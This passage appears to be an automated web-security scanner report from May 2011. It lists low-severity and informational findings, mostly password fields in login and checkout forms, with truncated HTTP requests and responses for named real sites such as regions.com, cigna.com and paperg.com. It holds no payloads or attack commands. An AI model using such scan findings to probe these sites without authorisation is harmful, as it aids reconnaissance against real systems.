| GET /virtualMedia/img3090.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 6969 Content-Type: image/jpeg Last-Modified: Thu, 28 Apr 2011 18:47:12 GMT Accept-Ranges: bytes ETag: "b0509dafd45cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT ......JFIF.....d.d..... .. .......................#"""#'''' . ...................................!! !!''''''''''......x.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3094.jpg | 
| GET /virtualMedia/img3094.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 19053 Content-Type: image/jpeg Last-Modified: Fri, 29 Apr 2011 12:26:29 GMT Accept-Ranges: bytes ETag: "f09e7aaa686cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT ......JFIF.....d.d..... ... . .. ......................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3107.jpg | 
| GET /virtualMedia/img3107.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 6714 Content-Type: image/jpeg Last-Modified: Fri, 29 Apr 2011 19:47:10 GMT Accept-Ranges: bytes ETag: "a0d87c3aa66cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT ......JFIF.....d.d..... .. .......................#"""#'''' . ...................................!! !!''''''''''......x.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3108.jpg | 
| GET /virtualMedia/img3108.jpg HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Content-Length: 6824 Content-Type: image/jpeg Last-Modified: Fri, 29 Apr 2011 19:47:23 GMT Accept-Ranges: bytes ETag: "60eb1a42a66cc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:16:23 GMT ......JFIF.....d.d..... .. .......................#"""#'''' . ...................................!! !!''''''''''......x.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img3132.jpg | 
| GET /virtualMedia/img3132.jpg HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.regions.com/ Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 7184 Content-Type: image/jpeg Last-Modified: Wed, 04 May 2011 18:55:25 GMT Accept-Ranges: bytes ETag: "80abd2d38cacc1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:42:05 GMT ......JFIF.....d.d..... .. .......................#"""#'''' . ...................................!! !!''''''''''......x.... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /virtualMedia/img506.gif | 
| GET /virtualMedia/img506.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Set-Cookie: www.regions.com-ssl Content-Length: 4606 Content-Type: image/gif Last-Modified: Wed, 26 Sep 2007 18:49:52 GMT Accept-Ranges: bytes ETag: "5032cc56e0c81:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:09 GMT GIF89a..<.........(...f. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regionsmo | 
| Path: | /BeforeYouBegin/ApplyNow | 
| GET /BeforeYouBegin/ApplyNow HTTP/1.1 Host: www.regionsmortgage.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-AspNetMvc-Version: 1.0 Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 9578 Set-Cookie: NSC_uppmt.sfhjpot.dpn-xfc Set-Cookie: NSC_uppmt.sfhjpotnpsuhbhf Content-Length: 9578 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> Region ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.xsnet.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.xsnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 41050 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=aFDnl Date: Mon, 16 May 2011 17:07:35 GMT Set-Cookie: HUBSPOT32=236000428.20480 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head id="Head"> <script type="text/javascript"> //<! ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://xsinternational | 
| Path: | /salog.js.aspx | 
| GET /salog.js.aspx HTTP/1.1 Host: xsinternational.app6 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.xsnet.com/ | 
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 498 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=QPwMR Set-Cookie: hubspotutk=86af4891-a613 Date: Mon, 16 May 2011 17:07:56 GMT Set-Cookie: HUBSPOT39=252777644.0 var hsUse20Servers = true; var hsDayEndsIn = 39123; var hsWeekEndsIn = 557523; var hsMonthEndsIn = 1335123; var hsAnalyticsServer = "tracking.hubspot.com"; var hsTimeStamp = "2011-05-16 13:07 ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:29:10 GMT Content-type: text/html Cache-control: no-cache Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <!--Note: formatting/beautifying this code seems to break something. Leave as-is. --> <html> <head> ...[SNIP]... <table class="homeLogIn"> <form name="frmLogin" id="frmLogin" method="post" action="" onSubmit="return submitLogin();"> <input type="hidden" name="TARGET" value=""> ...[SNIP]... <td> <input type="password" maxLength="32" size="22" name="PASSWORD" style="width:125px; height:15px;" class="portal"> </td> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /wps/portal | 
| POST /wps/portal HTTP/1.1 Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna Cache-Control: max-age=0 Origin: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:31:34 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 20913 ibm-web2-location: /wps/portal/!ut/p/c5/04 cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID_CHCP Set-Cookie: PD_STATEFUL_31b6dc34-289d Content-Length: 20575 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" xmlns="http://www.w3.org/ ...[SNIP]... <td colspan="2"> <form name="cignaLoginForm" method="post" action="/pkmslogin.form" > <input type="text" name="USERNAME" size="12" maxlength="32" value=""> ...[SNIP]... <td> <input type="password" name="PASSWORD" size="14" maxlength="15"> </td> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | /Cart/Address | 
| GET /Cart/Address HTTP/1.1 Host: www.frontrowusa.com Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:27:31 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div id="cart"> <form id="CheckoutForm" method="post" action="/Cart/Address" onSubmit="return checkTerms();"> <input id="formAction" type="hidden" name="action" value="update" /> ...[SNIP]... <td><input type="password" name="order[Password1]" value="" /></td> ...[SNIP]... <td><input type="password" name="order[Password2]" value="" /></td> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | /members/login | 
| GET /members/login HTTP/1.1 Host: www.frontrowusa.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:12 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13047 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... </h2> <form method="post" action="/members/login"> <div> ...[SNIP]... </label><input id="login_password" type="password" name="Password" /></div> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 11476 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /company.php | 
| GET /company.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com/ Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:38 GMT Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 11250 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /contact.php | 
| GET /contact.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 11383 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /join.php | 
| GET /join.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:14:00 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 12598 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /press.php | 
| GET /press.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:20:32 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 13132 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /publishers/flyerboard | 
| GET /publishers/flyerboard Host: www.paperg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:35 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 14:45:35 GMT Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 14896 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /publishers/placelocal | 
| GET /publishers/placelocal Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:20:15 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 13131 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /support.php | 
| GET /support.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 12289 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.paperg.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:46:28 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2977 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conte ...[SNIP]... <div id="cMiddle" align=center> <form action="login.php" method="post" style="width:100%"> <table class="login_div"> ...[SNIP]... <td><input type="password" name="pass" /></td> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | /post.php | 
| GET /post.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27786045 | 
| HTTP/1.0 200 OK Date: Mon, 16 May 2011 16:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <title>PaperG | Post a Flyer</title> <meta http-equiv="Content-Type" co ...[SNIP]... <div id="login"> <form id="client-login" action="login.php" method="post"> <input class="text" name="email" type="text" value="email" onclick="clickclear(this, 'email')" onblur="clickrecall(this, <input class="text" name="pass" type="password" value="password" onclick="clickclear(this, 'password')" onblur="clickrecall(this, <input type="image" src="images/rightarrow ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | /post.php | 
| GET /post.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27786045 | 
| HTTP/1.0 200 OK Date: Mon, 16 May 2011 16:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <title>PaperG | Post a Flyer</title> <meta http-equiv="Content-Type" co ...[SNIP]... </script> <form name="campaign_form" enctype="multipart/form <input type="hidden" name="owner_id" value="0"> ...[SNIP]... <td> <input type="password" name="login_password" id="login_password" onkeydown="on_login_enter <span id="msg_login_password"> ...[SNIP]... <td> <input maxlength=30 name="account_password" type="password" onchange="saveInput(this <br /> ...[SNIP]... <td> <input maxlength=30 name="account_confirm <span id="msg_account_confirm ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=4d3oqoeopj | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 16:15:21 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:20 GMT Set-Cookie: success_cookie_name Vary: Accept-Encoding Content-Length: 13932 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <div id="login"> <form id="loginForm" method="post" action="https://www <span id="error_login" class="error"> ...[SNIP]... </div><input type="password" id="password" name="password"/><div class="clear"> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | /forgot_password.php | 
| GET /forgot_password.php HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com | 
